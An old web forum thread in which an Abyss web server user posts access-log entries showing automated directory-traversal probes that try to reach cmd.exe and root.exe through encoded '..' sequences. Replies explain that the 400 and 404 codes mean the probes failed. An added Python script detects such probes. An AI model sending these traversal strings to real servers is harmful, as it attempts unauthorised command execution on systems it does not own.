Hacking Abyss server

mekp21
Joined: 27 Mar 2003
Posts: 2

Posted: Tue Apr 22, 2003 11:10 pm    Post subject: Hacking Abyss server

I have had Abyss running for the past week and love it. But checking the access log reveals something odd:

24.205.10.212 - - [21/Apr/2003:21:49:38 +1133] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
24.205.10.212 - - [21/Apr/2003:21:49:39 +1133] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
24.205.10.212 - - [21/Apr/2003:22:06:46 +1133] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 266
24.205.10.212 - - [21/Apr/2003:22:06:46 +1133] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 266
24.205.10.212 - - [21/Apr/2003:22:06:46 +1133] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266
24.205.10.212 - - [21/Apr/2003:22:06:47 +1133] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266
24.205.10.212 - - [21/Apr/2003:22:06:47 +1133] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
24.205.10.212 - - [21/Apr/2003:22:06:47 +1133] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
24.205.10.212 - - [21/Apr/2003:22:06:47 +1133] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
24.205.10.212 - - [21/Apr/2003:22:06:47 +1133] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
24.205.10.212 - - [21/Apr/2003:22:06:48 +1133] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
24.205.10.212 - - [21/Apr/2003:22:06:48 +1133] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
24.205.10.212 - - [21/Apr/2003:22:06:48 +1133] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
24.205.10.212 - - [21/Apr/2003:22:06:48 +1133] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
24.205.10.212 - - [21/Apr/2003:22:06:49 +1133] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
24.205.10.212 - - [21/Apr/2003:22:06:49 +1133] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
68.36.130.141 - - [22/Apr/2003:01:00:08 +1133] "OPTIONS / HTTP/1.1" 200 259
24.93.117.108 - - [22/Apr/2003:01:01:04 +1133] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 266
24.93.117.108 - - [22/Apr/2003:01:01:04 +1133] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 266
24.93.117.108 - - [22/Apr/2003:01:01:08 +1133] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266
24.93.117.108 - - [22/Apr/2003:01:01:14 +1133] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266
24.93.117.108 - - [22/Apr/2003:01:01:18 +1133] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
24.93.117.108 - - [22/Apr/2003:01:01:21 +1133] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
24.93.117.108 - - [22/Apr/2003:01:01:25 +1133] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
24.93.117.108 - - [22/Apr/2003:01:01:25 +1133] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
24.93.117.108 - - [22/Apr/2003:01:01:25 +1133] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
24.93.117.108 - - [22/Apr/2003:01:01:26 +1133] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
24.93.117.108 - - [22/Apr/2003:01:01:29 +1133] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
24.93.117.108 - - [22/Apr/2003:01:01:36 +1133] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
24.93.117.108

is just a sample of the log. It seems to happen every night around the same time, and I realize the 400 or the 404 at the end of the line means they didn't get through, but what are the chances that they will eventually?
Jason
feamsr00
Joined: 04 Jun 2002
Posts: 138
Location: Phila PA

Posted: Tue Apr 22, 2003 11:31 pm    Post subject:

It means absolutely nothing to you. As long as you run Abyss, you are not affected.
WhiteDevil
Joined: 07 Oct 2002
Posts: 74
Location: United Kingdom

Posted: Wed Apr 23, 2003 9:06 am    Post subject:

Everywhere you are getting the number 404 come up, it means that the person requesting items from your server was denied them...
Error 400 means Bad Request, so the "hacker" still didn't get what they were after...

If you ever get error 200, 201 or 202, then post here, because someone has found a major security risk...
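An added example, not part of any post in this thread: a small triage script for an access log like the one quoted above, which fully decodes each request path and reports, per client, how many probe requests were seen and how many of those were answered with a 2xx status. A 2xx alone is not the signal (the `OPTIONS /` request in the quoted log returned 200), so only requests matching the probe patterns are counted; the function names and the sample lines with documentation-range IPs are constructed for illustration.

```python
import re
from urllib.parse import unquote_to_bytes

# Common Log Format, as in the access log quoted in the thread.
CLF = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*" (\d{3}) \S+$')

def fully_decode(target, max_rounds=5):
    """Percent-decode repeatedly, so %255c becomes %5c and then a backslash."""
    data = target.encode("latin-1", "replace")
    for _ in range(max_rounds):
        data, prev = unquote_to_bytes(data), data
        if data == prev:
            break
    return data.lower()

def classify(line):
    """Return (ip, status, reasons); reasons is empty for ordinary requests."""
    m = CLF.match(line.strip())
    if not m:
        return None
    ip, target, status = m.groups()
    path = fully_decode(target)
    reasons = []
    if b"cmd.exe" in path or b"root.exe" in path:
        reasons.append("shell-binary")
    if b"../" in path or b"..\\" in path:
        reasons.append("traversal")
    # 0xC0 and 0xC1 never appear in valid UTF-8; they only start overlong forms.
    if b"\xc0" in path or b"\xc1" in path:
        reasons.append("overlong-utf8")
    return ip, int(status), reasons

def summarize(lines):
    """Per client IP: probes seen, and how many were answered with 2xx."""
    out = {}
    for ip, status, reasons in filter(None, map(classify, lines)):
        if reasons:
            row = out.setdefault(ip, {"probes": 0, "served": 0})
            row["probes"] += 1
            row["served"] += 200 <= status < 300
    return out

# Constructed sample: request shapes from the thread, documentation-range IPs.
SAMPLE = [
    '192.0.2.10 - - [21/Apr/2003:22:06:46 +0000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 266',
    '192.0.2.10 - - [21/Apr/2003:22:06:48 +0000] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268',
    '192.0.2.20 - - [22/Apr/2003:01:00:08 +0000] "OPTIONS / HTTP/1.1" 200 259',
    '192.0.2.30 - - [22/Apr/2003:01:01:04 +0000] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 1024',
]
```

Calling `summarize(SAMPLE)` leaves out the benign `OPTIONS` client and shows a non-zero `served` count only for the constructed line where a probe was answered with 200, which is the case worth investigating.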